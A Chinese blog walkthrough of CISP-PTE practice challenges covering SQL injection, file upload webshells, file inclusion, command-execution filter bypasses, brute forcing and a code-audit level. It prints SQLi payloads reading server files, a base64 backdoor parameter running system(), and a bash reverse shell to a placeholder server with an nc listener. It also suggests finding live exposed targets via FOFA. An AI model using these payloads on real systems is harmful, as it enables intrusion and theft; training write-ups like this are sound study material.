CSIP-PTE题目及通关

前言

CSIP-PTE证书算是一个非常有含金量的证书,但是由于昂贵的考试费(考证加·培训2w)但是如果想要考csip的证书的话提前做做训练题很有必要的。

获取题目方式:打开fofa 输入 body="CISP-PTE"

image 46 - CSIP-PTE题目及通关

有些网站打开就是一些CISP的题目 要有耐心 慢慢找

image 47 - CSIP-PTE题目及通关

SQL注入

image 48 - CSIP-PTE题目及通关

进入题目

image 49 - CSIP-PTE题目及通关

题目已经提示了 包裹id的姿势为('%id%')

尝试一下

image 50 - CSIP-PTE题目及通关

判断回显个数

image 56 - CSIP-PTE题目及通关

回显个数为7

image 57 - CSIP-PTE题目及通关

通过提示发现union被过滤了 双写绕过

image 55 - CSIP-PTE题目及通关

题目说key在/tmp/key下

payload :id=-1%') UNunionION SELECT 1,load_file("/tmp/key"),3,4,5,6,7 --+

image 77 - CSIP-PTE题目及通关

文件上传

image 72 - CSIP-PTE题目及通关

一句话木马 后缀为jpg

image 73 - CSIP-PTE题目及通关

上传然后抓包 这里使用的00截断 然后由于是post所以需要decode编码

image 154 - CSIP-PTE题目及通关

查看flag

image 75 - CSIP-PTE题目及通关

文件包含

image 59 - CSIP-PTE题目及通关
image 60 - CSIP-PTE题目及通关

通过url可以发现该页面包含的是view.html

尝试访问该文件

image 61 - CSIP-PTE题目及通关

在源码中发现一个类似为php的后门文件

image 62 - CSIP-PTE题目及通关

构造payload(x=1&z0=c3lzdGVtKCd0YWMgL3Zhci93d3cvaHRtbC9rZXkucGhwJyk7)

image 123 - CSIP-PTE题目及通关

得到flag

image 124 - CSIP-PTE题目及通关

也可以使用filer协议查看key文件

image 63 - CSIP-PTE题目及通关

一发入魂 解码 得到key

image 64 - CSIP-PTE题目及通关

命令执行

image 152 - CSIP-PTE题目及通关

如cat、tac、less、more、tail这些,将tac中间加入一个\即可绕过 即可查看flag

image 150 - CSIP-PTE题目及通关

暴力破解

image 144 - CSIP-PTE题目及通关

由于这题可以看到验证码在判断完之后不会销毁,而是在页面刷新之后验证码才会刷新

所以可以直接输入正确的验证码然后爆破密码

最后得到正确的密码为123qwe

image 143 - CSIP-PTE题目及通关

得到flag

image 145 - CSIP-PTE题目及通关

sql注入

image 65 - CSIP-PTE题目及通关

发现# --+都被过滤了

image 66 - CSIP-PTE题目及通关

使用url编码# %23

image 67 - CSIP-PTE题目及通关

空格也被绕过 使用/**/代替空格

image 68 - CSIP-PTE题目及通关

联合查询 union也被过滤 双写绕过

image 69 - CSIP-PTE题目及通关
image 70 - CSIP-PTE题目及通关

得到flag

image 71 - CSIP-PTE题目及通关

文件上传

image 109 - CSIP-PTE题目及通关

一句话木马如下

image 110 - CSIP-PTE题目及通关

修改php文件后缀为jpg 查看是否对该木马内容进行识别

image 111 - CSIP-PTE题目及通关

那么该木马可以进行使用

尝试抓包 修改后缀

image 146 - CSIP-PTE题目及通关

修改后缀为phP

image 147 - CSIP-PTE题目及通关

查看flag

image 114 - CSIP-PTE题目及通关

文件包含

image 78 - CSIP-PTE题目及通关

未发现任何后门文件

image 125 - CSIP-PTE题目及通关

使用fileter协议

image 81 - CSIP-PTE题目及通关
image 79 - CSIP-PTE题目及通关

得到flag

image 80 - CSIP-PTE题目及通关

命令执行

image 82 - CSIP-PTE题目及通关

使用tac命令查看key文件

image 83 - CSIP-PTE题目及通关

得到flag

image 84 - CSIP-PTE题目及通关

日志分析

image 85 - CSIP-PTE题目及通关

下载日志

image 86 - CSIP-PTE题目及通关

几乎从头看到尾 发现敏感目录

image 87 - CSIP-PTE题目及通关

发现是一个登录框 尝试使用万能密码 无果只能爆破

image 148 - CSIP-PTE题目及通关

得到账号为admin 密码为password123

登录得到flag

image 89 - CSIP-PTE题目及通关

二阶sql注入

image 107 - CSIP-PTE题目及通关

万能密码无果

image 108 - CSIP-PTE题目及通关

注册一个新账户 这里我试过%23 无果 尝试使用# 注释

image 104 - CSIP-PTE题目及通关
image 105 - CSIP-PTE题目及通关

点击重置密码

image 103 - CSIP-PTE题目及通关

尝试登录admin 登录上得到flag

image 106 - CSIP-PTE题目及通关

文件上传

image 115 - CSIP-PTE题目及通关

一句话木马

image 110 - CSIP-PTE题目及通关
image 116 - CSIP-PTE题目及通关

没有识别出文件内容

image 117 - CSIP-PTE题目及通关

抓包

image 149 - CSIP-PTE题目及通关

修改后缀为php 发现上传成功

image 119 - CSIP-PTE题目及通关

查看flag

image 120 - CSIP-PTE题目及通关

文件包含

image 121 - CSIP-PTE题目及通关
image 128 - CSIP-PTE题目及通关

这关filter协议无效 会在界面上输出一个error

但是这关有后门文件

image 129 - CSIP-PTE题目及通关

解码

image 130 - CSIP-PTE题目及通关

构造payload(Hello=1&z0=c3lzdGVtKCd0YWMgL3Zhci93d3cvaHRtbC9rZXkucGhwJyk7)

得到flag

image 131 - CSIP-PTE题目及通关

代码审计

image 134 - CSIP-PTE题目及通关

这串代码从上往下解读就是输出你所输入命令的长度,如果长度小于30就执行exec函数,如果大于30就执行highlight_file函数,最后在打印你的主机ip。

如果对这两个函数不懂的请点击这里exec&& highlight_file

这关你无论输入任何命令 界面都只会回显长度和用户的源ip,往里写一句话木马但是不知道路径,所以思路就是反弹shell。

很显然常规的python反弹 php反弹长度都过长 只能使用curl反弹。

打开一台服务器

进入/var/www/html目录,将index.html修改为以下内容

bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 #填写自己的服务器IP

随后开启apache

service apache2 restart 

然后开启侦听

nc -lvvp 4444

随后在题目中进行传参

image 136 - CSIP-PTE题目及通关

服务器端得到shell 查看flag

image 137 - CSIP-PTE题目及通关

命令执行

image 138 - CSIP-PTE题目及通关
image 139 - CSIP-PTE题目及通关

经过测试发现管道符; | ||被过滤,tac,ls,cat,nore,less,tail等都被过滤了,单输入php也报敏感字符所以php也被过滤了,但是在php中加一个\就没有报敏感字符。

image 140 - CSIP-PTE题目及通关

使用cat,less,more界面都回显good luck

image 141 - CSIP-PTE题目及通关

当使用tac查看文件时则可以查看到flag

image 142 - CSIP-PTE题目及通关

总结

这些题目对我来说难度还是有点的,大概花了两天时间,收获也挺多。对于一些大佬们来说估计这种题目都不够做的,像这种题目一般都是需要一些思路和经验,不会做也不要泄气,一步一个脚印才是真的。

免杀工具veil初探

上一篇

Nostromo 远程命令执行(CVE-2019-16278)

下一篇
评论
发表评论 说点什么
还没有评论
156